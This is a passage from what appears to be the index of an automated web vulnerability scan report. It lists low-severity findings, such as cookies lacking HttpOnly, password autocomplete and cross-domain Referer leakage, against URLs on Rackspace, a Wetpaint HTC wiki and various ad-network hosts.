9.79. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s56129266992211

9.80. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s57086813680361

9.81. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s58909093996044

9.82. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s59110638415440

9.83. http://rackspacecom.112.2o7.net/b/ss/rackspacecom/1/H.21/s53205813220702

9.84. https://sb.voicefive.com/b

9.85. https://signup.apps.rackspace.com/

9.86. http://sync.mathtag.com/sync/img

9.87. http://tags.bluekai.com/site/364

9.88. http://tags.bluekai.com/site/364/

9.89. http://tags.bluekai.com/site/616

9.90. http://video.google.com/videosearch

9.91. http://www.baidu.com/

9.92. http://www.bing.com/

9.93. http://www.cellphoneshop.net/htc.html/

9.94. http://www.facebook.com/%s

9.95. http://www.facebook.com/2008/fbml

9.96. http://www.facebook.com/campaign/landing.php

9.97. http://www.facebook.com/home.php

9.98. http://www.rackspace-hosting.de/

9.99. http://www.rackspace.co.uk/

9.100. http://www.rackspace.co.uk/cloud-hosting/

9.101. http://www.rackspace.co.za/

9.102. http://www.rackspace.com/blog/

9.103. http://www.rackspace.com/forms/contactsales.php

9.104. http://www.rackspace.com/forms/solutionpartnerapplication.php

9.105. http://www.rackspace.com/hosting_solutions.php

9.106. http://www.rackspace.com/index.php

9.107. http://www.rackspace.com/index.php

9.108. http://www.rackspace.com/information/aboutus.php

9.109. http://www.rackspace.com/information/contactus.php

9.110. http://www.rackspace.com/information/events/briefingprogram.php

9.111. http://www.rackspace.com/information/events/index.php

9.112. http://www.rackspace.com/information/events/rackgivesback.php

9.113. http://www.rackspace.com/information/hosting101/index.php

9.114. http://www.rackspace.com/information/index.php

9.115. http://www.rackspace.com/information/legal/clouddriveterms.php

9.116. http://www.rackspace.com/information/legal/generalterms.php

9.117. http://www.rackspace.com/information/legal/index.php

9.118. http://www.rackspace.com/information/legal/mailterms.php

9.119. http://www.rackspace.com/information/legal/privacystatement.php

9.120. http://www.rackspace.com/information/legal/sharepointappterms.php

9.121. http://www.rackspace.com/information/links.php

9.122. http://www.rackspace.com/information/newsroom/

9.123. http://www.rackspace.com/managed_hosting/

9.124. http://www.rackspace.com/managed_hosting/configurations.php

9.125. http://www.rackspace.com/managed_hosting/dedicated_servers.php

9.126. http://www.rackspace.com/managed_hosting/ecommerce/index.php

9.127. http://www.rackspace.com/managed_hosting/index.php

9.128. http://www.rackspace.com/managed_hosting/managed_colocation/index.php

9.129. http://www.rackspace.com/managed_hosting/private_cloud/index.php

9.130. http://www.rackspace.com/managed_hosting/richmedia/index.php

9.131. http://www.rackspace.com/managed_hosting/saas/index.php

9.132. http://www.rackspace.com/managed_hosting/services/index.php

9.133. http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php

9.134. http://www.rackspace.com/managed_hosting/services/storage/index.php

9.135. http://www.rackspace.com/managed_hosting/support/customers/index.php

9.136. http://www.rackspace.com/managed_hosting/websites/index.php

9.137. http://www.rackspace.com/partners/index.php

9.138. http://www.rackspace.com/partners/partnersearch.php

9.139. http://www.rackspace.com/searchresults.php

9.140. http://www.rackspace.com/sitemap404.php

9.141. http://www.rackspace.com/whyrackspace/expertise/index.php

9.142. http://www.rackspace.com/whyrackspace/index.php

9.143. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php

9.144. http://www.rackspace.com/whyrackspace/network/datacenters.php

9.145. http://www.rackspace.com/whyrackspace/network/index.php

9.146. http://www.rackspace.com/whyrackspace/support/index.php

9.147. http://www.rackspace.dk/

9.148. http://www.rackspace.nl/

9.149. http://www.rackspacecloud.com/index.php

9.150. http://www.rackspacehosting.no/

9.151. http://www.rackspacehosting.se/

9.152. http://www.wetpaintcentral.com/page/Help

9.153. http://www.wtp101.com/admeld_sync

10. Cookie without HttpOnly flag set

10.1. https://admin.instantservice.com/Customer

10.2. https://admin.instantservice.com/links/7513/40197

10.3. https://admin.instantservice.com/links/7513/40203

10.4. https://admin.instantservice.com/links/7513/40204

10.5. https://admin.instantservice.com/links/7513/40205

10.6. https://admin.instantservice.com/links/7513/40207

10.7. https://admin.instantservice.com/links/7513/40209

10.8. https://admin.instantservice.com/links/7513/40533

10.9. http://ads.adxpose.com/ads/ads.js

10.10. http://ads2.adbrite.com/favicon.ico

10.11. https://affiliates.rackspacecloud.com/

10.12. http://create.wetpaint.com/

10.13. http://create.wetpaint.com/scripts/wptrk

10.14. http://dc.tremormedia.com/rm.gif

10.15. http://event.adxpose.com/event.flow

10.16. http://htcwiki.wetpaint.com/

10.17. http://htcwiki.wetpaint.com/account/ellerburnes

10.18. http://htcwiki.wetpaint.com/account/heidianna

10.19. http://htcwiki.wetpaint.com/account/scottpj

10.20. http://htcwiki.wetpaint.com/accountSearch/all

10.21. http://htcwiki.wetpaint.com/contact

10.22. http://htcwiki.wetpaint.com/finish

10.23. http://htcwiki.wetpaint.com/forum

10.24. http://htcwiki.wetpaint.com/news

10.25. http://htcwiki.wetpaint.com/page/About+HTC

10.26. http://htcwiki.wetpaint.com/page/About+Smartphones

10.27. http://htcwiki.wetpaint.com/page/About+the+HTC+Wiki

10.28. http://htcwiki.wetpaint.com/page/Accessories

10.29. http://htcwiki.wetpaint.com/page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically

10.30. http://htcwiki.wetpaint.com/page/Any%20clue%20how%20to%20assigning%20a%20personal%20mp3%20as%20messaging%20ringtone,%20IS%20THERE%20AN%20APT%20I%20CAN%20USE

10.31. http://htcwiki.wetpaint.com/page/Aunsoft+Thanksgiving+Videos

10.32. http://htcwiki.wetpaint.com/page/Best+HTC+Video+Converter

10.33. http://htcwiki.wetpaint.com/page/HTC%20Apache%20(Sprint%20PPC%206700)

10.34. http://htcwiki.wetpaint.com/page/HTC%20Atlas%20(T-Mobile%20Wing)

10.35. http://htcwiki.wetpaint.com/page/HTC%20Touch%20Pro%202%20(T7373)

10.36. http://htcwiki.wetpaint.com/page/HTC+ALPINE

10.37. http://htcwiki.wetpaint.com/page/HTC+Artemis

10.38. http://htcwiki.wetpaint.com/page/HTC+BLUE+ANGEL

10.39. http://htcwiki.wetpaint.com/page/HTC+Fuze

10.40. http://htcwiki.wetpaint.com/page/HTC+Fuze+Reviews

10.41. http://htcwiki.wetpaint.com/page/HTC+Fuze+Wi-Fi

10.42. http://htcwiki.wetpaint.com/page/HTC+HD2+customization

10.43. http://htcwiki.wetpaint.com/page/HTC+Hero

10.44. http://htcwiki.wetpaint.com/page/HTC+Mogul

10.45. http://htcwiki.wetpaint.com/page/HTC+Mogul+Reviews

10.46. http://htcwiki.wetpaint.com/page/HTC+Pocket+PCs

10.47. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Questions

10.48. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/diff/452,453

10.49. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/file

10.50. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/history

10.51. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/links

10.52. http://htcwiki.wetpaint.com/page/HTC+Smartphones

10.53. http://htcwiki.wetpaint.com/page/HTC+Touch+HD++problem

10.54. http://htcwiki.wetpaint.com/page/HTC+Touch+Pro

10.55. http://htcwiki.wetpaint.com/page/HTC+Touch+Pro+Reviews

10.56. http://htcwiki.wetpaint.com/page/HTC+Touch+Reviews

10.57. http://htcwiki.wetpaint.com/page/How+to+Put+Blu-ray+DVD+movies+and+Videos+to+HTC+Epic+4G

10.58. http://htcwiki.wetpaint.com/page/How+to+Put+Videos+to+HTC+Evo+on+Mac

10.59. http://htcwiki.wetpaint.com/page/Max+Commodity

10.60. http://htcwiki.wetpaint.com/page/News%20&%20Notes

10.61. http://htcwiki.wetpaint.com/page/News+&+Notes

10.62. http://htcwiki.wetpaint.com/page/Smartphone+Blogs+and+Forums

10.63. http://htcwiki.wetpaint.com/page/Smartphone+Chat

10.64. http://htcwiki.wetpaint.com/page/Smartphone+How-To

10.65. http://htcwiki.wetpaint.com/page/Smartphone+ROMs

10.66. http://htcwiki.wetpaint.com/page/Smartphone+Software

10.67. http://htcwiki.wetpaint.com/page/Sprint+Touch

10.68. http://htcwiki.wetpaint.com/page/T+Mobile+G1

10.69. http://htcwiki.wetpaint.com/page/T-Mobile+Dash+3G

10.70. http://htcwiki.wetpaint.com/page/T-Mobile+Shadow

10.71. http://htcwiki.wetpaint.com/page/Telus+P4000+Mogul

10.72. http://htcwiki.wetpaint.com/page/The+Chart+of+You

10.73. http://htcwiki.wetpaint.com/page/Touch+Pro2+unable+to+delete+text

10.74. http://htcwiki.wetpaint.com/page/Unlock%20Vodafone%20&%20Etisalat%20Egypt%20Wireless%20Router%20Modem%20HUAWEI%20E960

10.75. http://htcwiki.wetpaint.com/page/Verizon+Ozone

10.76. http://htcwiki.wetpaint.com/page/Viewing+Video+on+the+Mogul

10.77. http://htcwiki.wetpaint.com/page/XT9+default+words

10.78. http://htcwiki.wetpaint.com/page/android+phones+thru+t-mobile

10.79. http://htcwiki.wetpaint.com/page/anyone+know+an+apt+for+mpegs

10.80. http://htcwiki.wetpaint.com/page/arabic+software+for+htc+touch+hd

10.81. http://htcwiki.wetpaint.com/page/backup+contacts+to+computer

10.82. http://htcwiki.wetpaint.com/page/can%20htc%20t8282%20hd1%20be%20upgraded%20to%20windows%20mobile%206.1

10.83. http://htcwiki.wetpaint.com/page/convert+bluray+dvd+to+htc

10.84. http://htcwiki.wetpaint.com/page/download+wi-fi+for+p3400i

10.85. http://htcwiki.wetpaint.com/page/email+a+question+about+an+htc+PRODUCT

10.86. http://htcwiki.wetpaint.com/page/hdmi+output

10.87. http://htcwiki.wetpaint.com/page/how+i+add+arabic+software+to+my+htc+touch+hd

10.88. http://htcwiki.wetpaint.com/page/http:/www.brinked.com

10.89. http://htcwiki.wetpaint.com/page/imagio+remote+desktop

10.90. http://htcwiki.wetpaint.com/page/innovation

10.91. http://htcwiki.wetpaint.com/page/internet+problems+with+my+htc+hd2.

10.92. http://htcwiki.wetpaint.com/page/reset+password+for+my+cingular+8125

10.93. http://htcwiki.wetpaint.com/page/root+HTC+EVO+4G

10.94. http://htcwiki.wetpaint.com/page/sprint+htc+touch+pro2

10.95. http://htcwiki.wetpaint.com/page/sync+htc+desire+with+outlook+in+windows+7

10.96. http://htcwiki.wetpaint.com/page/t8282+operating+system

10.97. http://htcwiki.wetpaint.com/page/thread

10.98. http://htcwiki.wetpaint.com/privacy

10.99. http://htcwiki.wetpaint.com/rss2_0/pageReport/updated

10.100. http://htcwiki.wetpaint.com/search

10.101. http://htcwiki.wetpaint.com/search/everything/thread

10.102. http://htcwiki.wetpaint.com/sitemap

10.103. http://htcwiki.wetpaint.com/staticComponent/jsClass/AutoLookup

10.104. http://htcwiki.wetpaint.com/staticComponent/jsClass/AutoLookupConfig

10.105. http://htcwiki.wetpaint.com/staticComponent/jsClass/TagAutoLookup

10.106. http://htcwiki.wetpaint.com/tag/Android

10.107. http://htcwiki.wetpaint.com/tag/Device+home+page

10.108. http://htcwiki.wetpaint.com/tag/HTC

10.109. http://htcwiki.wetpaint.com/tag/Home

10.110. http://htcwiki.wetpaint.com/tag/Home+page

10.111. http://htcwiki.wetpaint.com/tag/Pocket+PC

10.112. http://htcwiki.wetpaint.com/tag/Smartphone

10.113. http://htcwiki.wetpaint.com/terms

10.114. http://htcwiki.wetpaint.com/whatsnew

10.115. http://htcwiki.wetpaint.com/xml/metadata/WELCOME_ANNOUNCEMENT

10.116. https://login.wetpaint.com/login.do

10.117. https://login.wetpaint.com/register.do

10.118. https://login.wetpaint.com/requestPasswordReset.do

10.119. https://login.wetpaint.com/sso.do

10.120. https://manage.rackspacecloud.com/

10.121. https://manage.rackspacecloud.com/pages/Login.jsp

10.122. https://my.rackspace.com/portal/home

10.123. http://static.wetpaint.com/

10.124. http://static.wetpaint.com/scripts/CSSApplication/wpc.css

10.125. http://static.wetpaint.com/scripts/wpcss/core/c.css

10.126. http://static.wetpaint.com/scripts/wpcss/family/f.css

10.127. http://static.wetpaint.com/scripts/wpcss/print/p.css

10.128. http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css

10.129. http://static.wetpaint.com/scripts/wpjs/www.js

10.130. http://static.wetpaint.com/scripts/wpjsPage/page/p.js

10.131. http://static.wetpaint.com/scripts/wpjsPage/pagesearch/p.js

10.132. http://static.wetpaint.com/staticComponent/iframe/track

10.133. http://status.apps.rackspace.com/

10.134. http://twitter.com/htc

10.135. http://twitter.com/rackapps

10.136. http://twitter.com/rackspace

10.137. http://twitter.com/share

10.138. http://widget.wetpaintserv.us/

10.139. http://www.brinked.com/

10.140. http://www.brinked.com/index.php

10.141. http://www.building43.com/

10.142. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

10.143. http://www.opensource.org/licenses/mit-license.php

10.144. http://www.quantcast.com/p-c0xFC9HiPwWw-

10.145. http://www.rackspace-hosting.de/

10.146. http://www.rackspace.co.uk/

10.147. http://www.rackspace.co.uk/cloud-hosting/

10.148. http://www.rackspace.co.za/

10.149. http://www.rackspace.com/apps/support

10.150. http://www.rackspace.com/apps/support/webinar_calendar

10.151. http://www.rackspace.com/apps/support/webinar_calendar/

10.152. http://www.rackspace.com/index.php

10.153. http://www.rackspace.dk/

10.154. http://www.rackspace.nl/

10.155. http://www.rackspacecloud.com/index.php

10.156. http://www.rackspacehosting.no/

10.157. http://www.rackspacehosting.se/

10.158. http://www.wetpaintcentral.com/page/Help

10.159. http://www.zagg.com/invisibleshield/cell-phone/htc

10.160. http://1055.ic-live.com/goat.php

10.161. http://1055.ic-live.com/goat.php

10.162. http://69.20.89.3/apps/blog/

10.163. http://a.tribalfusion.com/j.ad

10.164. http://ad.turn.com/server/ads.js

10.165. http://ad.turn.com/server/pixel.htm

10.166. http://ad.yieldmanager.com/pixel

10.167. http://admeld.lucidmedia.com/clicksense/admeld/match

10.168. http://ads.adbrite.com/adserver/vdi/742697

10.169. http://ads.adbrite.com/adserver/vdi/742697

10.170. http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505

10.171. http://ads.addynamix.com/creative/2-2126953-88j

10.172. http://ads.keewurd.com/js/psAdsJS.ashx

10.173. http://ads.keewurd.com/js/psAdsProc.ashx

10.174. http://ads.keewurd.com/js/psAdsProc.ashx

10.175. http://ads2.adbrite.com/v0/ad

10.176. http://amch.questionmarket.com/adsc/d828649/2/200196243484/decide.php

10.177. http://b.scorecardresearch.com/b

10.178. http://b.scorecardresearch.com/p

10.179. http://b.voicefive.com/b

10.180. http://bidder.mathtag.com/

10.181. http://blogsearch.google.com/blogsearch

10.182. http://books.google.com/

10.183. http://books.google.com/books

10.184. http://broadcast.rackspace.com/rackspacecloud/ror.xml

10.185. http://broadcast.rackspace.com/ror.xml

10.186. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

10.187. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.188. http://c.chango.com/collector/admeldpixel

10.189. http://clk.redcated/00A/go/285954474/direct/01/

10.190. http://clk.redcated/go/285954474/direct

10.191. http://cmp.112.2o7.net/b/ss/cmpglobalvista/1/H.16/s56061686433386

10.192. http://cmp.112.2o7.net/b/ss/cmpglobalvista/1/H.16/s56061686433386

10.193. http://cspix.media6degrees.com/orbserv/hbpix

10.194. http://d.audienceiq.com/r/dm/mkt/

10.195. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3011330574290390485

10.196. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3011330574290390485

10.197. http://d.mediabrandsww.com/r/dm/mkt/

10.198. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3011330574290390485

10.199. http://d.mediabrandsww.com/r/dt/id/L21rdC8zL21waWQvMjY0MDc4Mw

10.200. http://d.p-td.com/r/dm/mkt/

10.201. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3011330574290390485

10.202. http://ds.addthis.com/red/psi/sites/htcwiki.wetpaint.com/p.json

10.203. http://g.adspeed.net/ad.php

10.204. http://go.rackspace.com/rseawhitepaper.html

10.205. http://htcwiki.wetpaint.com/page/HTC%20Touch%20Pro%202%20(T7373)

10.206. http://htcwiki.wetpaint.com/page/How+to+get+to+NYP

10.207. http://htcwiki.wetpaint.com/page/picture+text+for+htc+touch

10.208. http://htcwiki.wetpaint.com/rss2_0/pageReport/updated

10.209. http://htcwiki.wetpaint.com/search/everything/thread

10.210. http://i.w55c.net/a.gif

10.211. http://images.google.com/images

10.212. http://load.exelator.com/load/

10.213. https://maps-api-ssl.google.com/maps

10.214. http://maps.google.com/maps

10.215. http://media.match.com/cookE/geoip/iframe

10.216. http://pixel.mathtag.com/creative/img

10.217. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

10.218. http://pixel.rubiconproject.com/tap.php

10.219. http://pixel.rubiconproject.com/tap.php

10.220. http://r.openx.net/set

10.221. http://r.turn.com/r/bd

10.222. http://r.turn.com/server/pixel.htm

10.223. http://rackspace.112.2o7.net/b/ss/rackmailtrust,rackspaceglobalrackspace/1/H.21/s52009643926285

10.224. http://rackspace.112.2o7.net/b/ss/rackmailtrust,rackspaceglobalrackspace/1/H.21/s52834550719708

10.225. http://rackspace.112.2o7.net/b/ss/rackmailtrust,rackspaceglobalrackspace/1/H.21/s55491744678001

10.226. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s51078792295884

10.227. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s53681895523332

10.228. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s53955851446371

10.229. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s53955851446371

10.230. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s54081834317184

10.231. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s54250897888559

10.232. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s54270176831632

10.233. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s56068197421263

10.234. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s57351888804696

10.235. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s57351888804696

10.236. http://rackspace.112.2o7.net/b/ss/rackspacecom,rackspaceglobalrackspace/1/H.20.3/s57919248731341

10.237. http://rackspace.112.2o7.net/b/ss/rackspacecom/1/H.20.3/s53717721186112

10.238. http://rackspace.112.2o7.net/b/ss/rackspacecom/1/H.20.3/s59084242144599

10.239. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s51234356388449

10.240. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s51737525232601

10.241. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s52506837272085

10.242. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s5381709807552

10.243. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s53922812654636

10.244. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s5416235087905

10.245. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s54472399808000

10.246. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s54835185494739

10.247. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s55233193852473

10.248. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s56129266992211

10.249. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s57086813680361

10.250. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s58909093996044

10.251. http://rackspace.112.2o7.net/b/ss/rackspacemossotest,rackspaceglobalrackspace/1/H.21/s59110638415440

10.252. http://rackspacecom.112.2o7.net/b/ss/rackspacecom/1/H.21/s53205813220702

10.253. https://sb.voicefive.com/b

10.254. https://signup.apps.rackspace.com/

10.255. https://signup.rackspacecloud.com/signup

10.256. http://sync.mathtag.com/sync/img

10.257. http://tags.bluekai.com/site/364

10.258. http://tags.bluekai.com/site/364/

10.259. http://tags.bluekai.com/site/616

10.260. http://um.adpredictive.com/amumatch

10.261. http://video.google.com/videosearch

10.262. http://www.addthis.com/bookmark.php

10.263. http://www.baidu.com/

10.264. http://www.bing.com/

10.265. http://www.cellphoneshop.net/htc.html/

10.266. http://www.facebook.com/%s

10.267. http://www.facebook.com/2008/fbml

10.268. http://www.facebook.com/home.php

10.269. http://www.mezzoblue.com/tests/revised-image-replacement/

10.270. http://www.omniture.com/

10.271. http://www.rackertalent.com/

10.272. http://www.rackspace.com/apps

10.273. http://www.rackspace.com/apps/

10.274. http://www.rackspace.com/apps/backup_and_collaboration/

10.275. http://www.rackspace.com/apps/backup_and_collaboration/data_backup_software/

10.276. http://www.rackspace.com/apps/backup_and_collaboration/online_file_storage/

10.277. http://www.rackspace.com/apps/blog/

10.278. http://www.rackspace.com/apps/blog/2010/06/increase_productivity_with_free_training/

10.279. http://www.rackspace.com/apps/careers/

10.280. http://www.rackspace.com/apps/contact_us/

10.281. http://www.rackspace.com/apps/contact_us/email_sales/

10.282. http://www.rackspace.com/apps/control_panel/

10.283. http://www.rackspace.com/apps/customers/

10.284. http://www.rackspace.com/apps/email_hosting/

10.285. http://www.rackspace.com/apps/email_hosting/compare/

10.286. http://www.rackspace.com/apps/email_hosting/email_archiving/

10.287. http://www.rackspace.com/apps/email_hosting/exchange_hosting/

10.288. http://www.rackspace.com/apps/email_hosting/exchange_hosting/on_your_mobile/

10.289. http://www.rackspace.com/apps/email_hosting/exchange_hybrid/

10.290. http://www.rackspace.com/apps/email_hosting/migrations/

10.291. http://www.rackspace.com/apps/email_hosting/rackspace_email/

10.292. http://www.rackspace.com/apps/email_hosting/rackspace_email/on_your_mobile/

10.293. http://www.rackspace.com/apps/email_hosting_service_planning_guide/

10.294. http://www.rackspace.com/apps/email_industry_leadership/

10.295. http://www.rackspace.com/apps/email_marketing_solutions/

10.296. http://www.rackspace.com/apps/email_provider/

10.297. http://www.rackspace.com/apps/fanatical_support/

10.298. http://www.rackspace.com/apps/file_sharing/

10.299. http://www.rackspace.com/apps/file_sharing/hosted_sharepoint/

10.300. http://www.rackspace.com/apps/r_customers/

10.301. http://www.rackspace.com/apps/reseller_program/

10.302. http://www.rackspace.com/apps/search/results/

10.303. http://www.rackspace.com/apps/submit_idea/

10.304. http://www.rackspace.com/apps/why_hosted_apps/

10.305. http://www.rackspace.com/blog/

10.306. http://www.rackspace.com/forms/contactsales.php

10.307. http://www.rackspace.com/forms/solutionpartnerapplication.php

10.308. http://www.rackspace.com/hosting_solutions.php

10.309. http://www.rackspace.com/index.php

10.310. http://www.rackspace.com/information/aboutus.php

10.311. http://www.rackspace.com/information/contactus.php

10.312. http://www.rackspace.com/information/events/briefingprogram.php

10.313. http://www.rackspace.com/information/events/index.php

10.314. http://www.rackspace.com/information/events/rackgivesback.php

10.315. http://www.rackspace.com/information/hosting101/index.php

10.316. http://www.rackspace.com/information/index.php

10.317. http://www.rackspace.com/information/legal/clouddriveterms.php

10.318. http://www.rackspace.com/information/legal/generalterms.php

10.319. http://www.rackspace.com/information/legal/index.php

10.320. http://www.rackspace.com/information/legal/mailterms.php

10.321. http://www.rackspace.com/information/legal/privacystatement.php

10.322. http://www.rackspace.com/information/legal/sharepointappterms.php

10.323. http://www.rackspace.com/information/links.php

10.324. http://www.rackspace.com/information/newsroom/

10.325. http://www.rackspace.com/managed_hosting/

10.326. http://www.rackspace.com/managed_hosting/configurations.php

10.327. http://www.rackspace.com/managed_hosting/dedicated_servers.php

10.328. http://www.rackspace.com/managed_hosting/ecommerce/index.php

10.329. http://www.rackspace.com/managed_hosting/index.php

10.330. http://www.rackspace.com/managed_hosting/managed_colocation/index.php

10.331. http://www.rackspace.com/managed_hosting/private_cloud/index.php

10.332. http://www.rackspace.com/managed_hosting/richmedia/index.php

10.333. http://www.rackspace.com/managed_hosting/saas/index.php

10.334. http://www.rackspace.com/managed_hosting/services/index.php

10.335. http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php

10.336. http://www.rackspace.com/managed_hosting/services/storage/index.php

10.337. http://www.rackspace.com/managed_hosting/support/customers/index.php

10.338. http://www.rackspace.com/managed_hosting/websites/index.php

10.339. http://www.rackspace.com/partners/index.php

10.340. http://www.rackspace.com/partners/partnersearch.php

10.341. http://www.rackspace.com/searchresults.php

10.342. http://www.rackspace.com/sitemap404.php

10.343. http://www.rackspace.com/whyrackspace/expertise/index.php

10.344. http://www.rackspace.com/whyrackspace/index.php

10.345. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php

10.346. http://www.rackspace.com/whyrackspace/network/datacenters.php

10.347. http://www.rackspace.com/whyrackspace/network/index.php

10.348. http://www.rackspace.com/whyrackspace/support/index.php

10.349. http://www.wtp101.com/admeld_sync

11. Password field with autocomplete enabled

11.1. https://affiliates.rackspacecloud.com/

11.2. http://apps.rackspace.com/

11.3. https://apps.rackspace.com/

11.4. https://beta.cp.rackspace.com/Login.aspx

11.5. https://beta.cp.rackspace.com/Login.aspx

11.6. http://bounce.adbrite.com/

11.7. http://bounce.adbrite.com/

11.8. https://cp.rackspace.com/Login.aspx

11.9. https://cp.rackspace.com/Login.aspx

11.10. http://iad.wm.emailsrvr.com/

11.11. https://iad.wm.emailsrvr.com/mail6/

11.12. https://login.wetpaint.com/login.do

11.13. https://login.wetpaint.com/register.do

11.14. http://m.rackspace.com/mail6/mobile/index.php

11.15. https://manage.rackspacecloud.com/Login.do

11.16. https://manage.rackspacecloud.com/pages/Login.jsp

11.17. https://manage.rackspacecloud.com/pages/Login.jsp

11.18. https://manage.rackspacecloud.com/pages/Login.jsp

11.19. https://my.rackspace.com/portal/auth/login

11.20. https://signup.rackspacecloud.com/signup

11.21. http://twitter.com/htc

11.22. http://twitter.com/rackapps

11.23. http://twitter.com/rackspace

11.24. http://www.brinked.com/

11.25. http://www.brinked.com/index.php

11.26. http://www.brinked.com/index.php

11.27. http://www.facebook.com/%s

11.28. http://www.facebook.com/2008/fbml

11.29. http://www.rackspace.com/hosting_knowledge/

11.30. http://www.rackspace.com/information/newsroom/

12. Source code disclosure

12.1. http://active.macromedia.com/flash2/cabs/swflash.cab

12.2. http://www.addthis.com/bookmark.php

13. Referer-dependent response

13.1. https://apps.rackspace.com/login.php

13.2. http://www.facebook.com/widgets/like.php

14. Cross-domain POST

14.1. http://69.20.89.3/apps/blog/

14.2. http://gigaom.com/2010/06/22/cloud-computing/

14.3. http://go.rackspace.com/rseawhitepaper.html

14.4. http://www.rackspace.com/forms/contactsales.php

14.5. http://www.rackspace.com/forms/solutionpartnerapplication.php

14.6. http://www.rackspace.com/managed_hosting/ecommerce/index.php

14.7. http://www.rackspace.com/managed_hosting/managed_colocation/index.php

14.8. http://www.rackspace.com/managed_hosting/services/database/index.php

14.9. http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php

14.10. http://www.rackspace.com/managed_hosting/services/proservices/sharepoint.php

15. Cross-domain Referer leakage

15.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

15.2. http://ad.turn.com/server/ads.js

15.3. http://ad.turn.com/server/ads.js

15.4. http://ad.turn.com/server/ads.js

15.5. http://ad.yieldmanager.com/pixel

15.6. http://admeld.lucidmedia.com/clicksense/admeld/match

15.7. http://ads2.adbrite.com/v0/ad

15.8. http://ads2.adbrite.com/v0/ad

15.9. http://ads2.adbrite.com/v0/ad

15.10. http://ads2.adbrite.com/v0/ad

15.11. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

15.12. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH

15.13. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH

15.14. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH

15.15. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH

15.16. http://apps.rackspace.com/

15.17. http://cm.g.doubleclick.net/pixel

15.18. http://cm.g.doubleclick.net/pixel

15.19. http://googleads.g.doubleclick.net/pagead/ads

15.20. http://htcwiki.wetpaint.com/panel/tagCloud

15.21. http://htcwiki.wetpaint.com/search/everything/thread

15.22. http://ir.rackspace.com/phoenix.zhtml

15.23. http://jqueryui.com/themeroller/

15.24. https://login.wetpaint.com/login.do

15.25. https://login.wetpaint.com/login.do

15.26. https://login.wetpaint.com/register.do

15.27. https://login.wetpaint.com/register.do

15.28. http://maps.google.com/maps

15.29. https://my.rackspace.com/portal/auth/login

15.30. https://my.rackspace.com/portal/auth/login

15.31. http://tag.admeld.com/ad/iframe/297/wetpaintv1/160x600/technology-atf

15.32. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

15.33. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

